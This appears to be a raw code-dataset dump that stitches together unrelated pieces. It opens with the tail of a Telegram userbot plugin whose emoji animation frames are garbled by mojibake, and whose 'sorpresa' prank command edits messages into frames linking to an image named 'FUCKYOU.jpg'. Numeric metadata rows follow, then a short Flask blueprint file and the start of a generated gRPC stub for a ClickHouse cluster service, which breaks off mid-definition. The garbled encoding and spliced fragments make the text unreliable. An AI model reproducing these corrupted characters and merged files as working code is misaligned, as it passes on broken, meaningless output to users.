"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️ð゚フホ◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\nð゚フユ◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️☀\n◼️◼️◼️◼️◼️`",
"`◼️ð゚フユ◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️☀◼️`",
"`◼️◼️◼️ð゚フユ◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️☀◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️ð゚フホ◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️◼️◼️◼️`",
"`◼️◼️◼️◼️◼️\n☀◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️ð゚フユ\n◼️◼️◼️◼️◼️`",
"`◼️☀◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️ð゚フユ◼️`",
"`◼️◼️◼️☀◼️\n◼️◼️◼️◼️◼️\n◼️◼️ð゚フホ◼️◼️\n◼️◼️◼️◼️◼️\n◼️ð゚フユ◼️◼️◼️`",
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 549755813888])
@borg.on(admin_cmd(pattern="sorpresa", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 17)
#input_str = event.pattern_match.group(1)
#if input_str == "sorpresa":
await event.edit("sorpresa")
animation_chars = [
"⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬜⬜⬜⬜\nð゚ムヌ⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬜⬜⬜\n⬜ð゚ムヌ⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬛⬜⬜\n⬜⬜ð゚ムヌ⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬛⬛⬜\n⬜⬜⬜ð゚ムヌ⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬛⬛⬜\n⬜⬜⬜⬛⬜\n⬜⬜⬜ð゚ムヌ⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬛⬛⬜\n⬜⬜⬜⬛⬜\n⬜⬜⬜⬛⬜\n⬜⬜⬜ð゚ムヌ⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜",
"⬛⬛⬛⬛⬜\n⬜⬜⬜⬛⬜\n⬜⬜⬜ð゚ムヌ⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜\n⬜⬜⬜⬜⬜",
"⬛⬛⬛⬛⬜\n⬜⬜⬜ð゚ムヌ⬜\n⬜⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜",
"⬛⬛⬛⬜⬜\n⬜⬜ð゚ムヌ⬜⬜\n⬜⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜",
"⬛⬛⬜⬜⬜\n⬜ð゚ムヌ⬜⬜⬜\n⬜[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜",
"⬛⬜⬜⬜⬜\nð゚ムヌ⬜⬜⬜⬜\n[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜",
"⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜",
"⬜⬜⬜⬜\n⬜⬜⬜⬜\n⬜⬜⬜⬜\n⬜⬜⬜⬜",
"⬜⬜⬜\n⬜⬜⬜\n⬜⬜⬜",
"⬜⬜\n⬜⬜",
"[ð゚ホチ](https://wpml.org/wp-content/uploads/2018/12/3033640-FUCKYOU.jpg)"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 17])
| 50.788265
| 126
| 0.281732
| 3,774
| 19,909
| 3.551934
| 0.04372
| 0.041925
| 0.126222
| 0.062663
| 0.930101
| 0.917941
| 0.895785
| 0.892279
| 0.830063
| 0.827079
| 0
| 0.015527
| 0.200964
| 19,909
| 391
| 127
| 50.918159
| 0.332223
| 0.016475
| 0
| 0.612583
| 0
| 0.043046
| 0.667033
| 0.571182
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.02649
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
9a9617a2e11cefe055fedb69e75194e8eab85456
| 107
|
py
|
Python
|
app/views/donation_feed/__init__.py
|
gagnokenneth/foodle
|
d18279fbdfb2919a7f66366a33bbf29db68475e3
|
[
"MIT"
] | null | null | null |
app/views/donation_feed/__init__.py
|
gagnokenneth/foodle
|
d18279fbdfb2919a7f66366a33bbf29db68475e3
|
[
"MIT"
] | null | null | null |
app/views/donation_feed/__init__.py
|
gagnokenneth/foodle
|
d18279fbdfb2919a7f66366a33bbf29db68475e3
|
[
"MIT"
] | 1
|
2022-03-23T08:38:40.000Z
|
2022-03-23T08:38:40.000Z
|
from flask import Blueprint
donation_feed_bp = Blueprint("donation_feed", __name__)
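# Imported after the blueprint is created so the routes module can register its view functions without a circular import.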
from . import routes
| 17.833333
| 55
| 0.803738
| 14
| 107
| 5.642857
| 0.642857
| 0.43038
| 0.531646
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130841
| 107
| 5
| 56
| 21.4
| 0.849462
| 0
| 0
| 0
| 0
| 0
| 0.121495
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
9ab64201a5d9c053f3deb6162026dcc0e1d12644
| 62,018
|
py
|
Python
|
yandex/cloud/mdb/clickhouse/v1/cluster_service_pb2_grpc.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
yandex/cloud/mdb/clickhouse/v1/cluster_service_pb2_grpc.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
yandex/cloud/mdb/clickhouse/v1/cluster_service_pb2_grpc.py
|
ovandriyanov/python-sdk
|
eec7dc65ef23789388fa46d13087d4a03cdc6e57
|
[
"MIT"
] | null | null | null |
# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from yandex.cloud.mdb.clickhouse.v1 import cluster_pb2 as yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2
from yandex.cloud.mdb.clickhouse.v1 import cluster_service_pb2 as yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2
from yandex.cloud.operation import operation_pb2 as yandex_dot_cloud_dot_operation_dot_operation__pb2
class ClusterServiceStub(object):
"""A set of methods for managing ClickHouse clusters.
"""
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Get = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Get',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.GetClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__pb2.Cluster.FromString,
)
self.List = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/List',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClustersResponse.FromString,
)
self.Create = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Create',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.CreateClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Update = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Update',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.UpdateClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Delete = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Delete',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.DeleteClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Start = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Start',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StartClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Stop = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Stop',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StopClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Move = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Move',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.MoveClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.AddZookeeper = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/AddZookeeper',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.AddClusterZookeeperRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Backup = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Backup',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.BackupClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.Restore = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/Restore',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RestoreClusterRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.RescheduleMaintenance = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/RescheduleMaintenance',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.RescheduleMaintenanceRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
)
self.ListLogs = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListLogs',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterLogsResponse.FromString,
)
self.StreamLogs = channel.unary_stream(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/StreamLogs',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamClusterLogsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.StreamLogRecord.FromString,
)
self.ListOperations = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListOperations',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsRequest.SerializeToString,
response_deserializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterOperationsResponse.FromString,
)
self.ListBackups = channel.unary_unary(
'/yandex.cloud.mdb.clickhouse.v1.ClusterService/ListBackups',
request_serializer=yandex_dot_cloud_dot_mdb_dot_clickhouse_dot_v1_dot_cluster__service__pb2.ListClusterBackupsRequest.SerializeToString,
